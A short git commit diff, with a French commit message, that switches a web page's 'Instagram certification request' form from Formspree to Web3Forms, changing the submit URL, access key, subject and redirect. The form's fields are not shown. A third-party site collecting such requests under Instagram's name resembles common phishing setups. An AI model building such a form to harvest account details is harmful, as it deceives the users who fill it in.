Changement vers Web3Forms pour la gestion du formulaire

--- a/index.html
+++ b/index.html
@@ -43,11 +43,11 @@
         </section>
 
         <div class="form-wrapper">
-            <form class="certification-form" action="https://formspree.io/f/xdkogryo" method="POST">
-                <!-- Champs de configuration Formspree -->
-                <input type="text" name="_gotcha" style="display:none">
-                <input type="hidden" name="_next" value="https://formspree.io/f/xdkogryo/merci.html">
-                <input type="hidden" name="_subject" value="Nouvelle demande de certification Instagram">
+            <form class="certification-form" action="https://api.web3forms.com/submit" method="POST">
+                <!-- Configuration Web3Forms -->
+                <input type="hidden" name="access_key" value="a68ac406-1c5c-4ae3-ae1c-86fa34d2764c">
+                <input type="hidden" name="subject" value="Nouvelle demande de certification Instagram">
+                <input type="hidden" name="redirect" value="https://votre-site.netlify.app/merci.html">
 
                 <div class="progress">
                     <div class="steps">
